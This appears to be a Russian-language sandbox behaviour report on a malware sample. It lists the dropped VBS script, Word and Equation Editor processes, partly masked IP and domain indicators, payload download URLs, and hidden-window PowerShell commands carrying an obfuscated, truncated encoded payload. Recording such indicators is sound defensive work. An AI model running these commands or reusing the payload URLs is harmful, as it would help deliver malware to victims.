Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\HTMLIEhistory.vbs"
- %APPDATA%\htmliehistory.vbs
- '18#.#54.37.174':80
- 'up#####eimagens.com.br':443
- http://18#.#54.37.174/pvtHTMLbroswer.dOC
- http://18#.#54.37.174/privateexploiteveningFile.vbs
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JvLwГ‡BBpvLwГ‡BG0vLwГ‡BYQBnvLwГ‡BGUvLwГ‡BVQByvLwГ‡BGwvLwГ‡BIvLwГ‡BvLwГ‡B9vLwГ‡BCvLwГ‡BvLwГ‡BJwBovLwГ‡BHQvLwГ‡BdvLwГ‡BBwvLwГ‡BHMvLwГ‡BOgvLwГ‡BvvLwГ‡BC8vLwГ‡BdQBwvLwГ‡BGwvLwГ...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JvLwГ‡BBpvLwГ‡BG0vLwГ‡BYQBnvLwГ‡BGUvLwГ‡BVQByvLwГ‡BGwvLwГ‡BIvLwГ‡BvLwГ‡B9vLwГ‡BCvLwГ‡BvLwГ‡BJwBovLwГ‡BHQvLwГ‡BdvLwГ‡BBwvLwГ‡BHMvLwГ‡BOgvLwГ‡BvvLwГ‡BC8vLwГ‡BdQBwvLwГ‡BGwvLwГ...